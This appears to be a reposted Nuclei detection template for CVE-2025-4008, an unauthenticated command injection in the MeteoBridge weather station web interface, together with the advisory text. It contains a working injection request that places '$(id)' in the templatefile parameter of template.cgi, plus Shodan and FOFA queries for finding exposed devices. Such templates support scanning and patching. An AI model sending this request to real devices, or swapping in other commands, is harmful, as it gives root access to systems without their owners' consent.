The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
PoC代码[已公开]
id: CVE-2025-4008
info:
name: MeteoBridge <= 6.1 - Remote Code Execution
author: iamnoooob,pdresearch
severity: high
description: |
The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
reference:
- https://forum.meteohub.de/viewtopic.php?t=18687
- https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
- https://nvd.nist.gov/vuln/detail/CVE-2025-4008
classification:
cve-id: CVE-2025-4008
cvss-score: 7.5
cwe-id: CWE-77
epss-score: 0.47353
epss-percentile: 0.97551
metadata:
verified: true
shodan-query: "meteobridge"
fofa-query: "Meteobridge"
tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln
http:
- raw:
- |
GET /public/template.cgi?templatefile=$(id) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Error: template file'
- 'uid='
- 'gid='
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100a9bf81730ab4ba8fceb90c9699542067b5eeca52f422a32234ba8185304324c30220691ad21d5a82f219fa34c6b533022431eec971160642c02b7d79f2efe89047eb:922c64590222798bb761d5b6d8e72950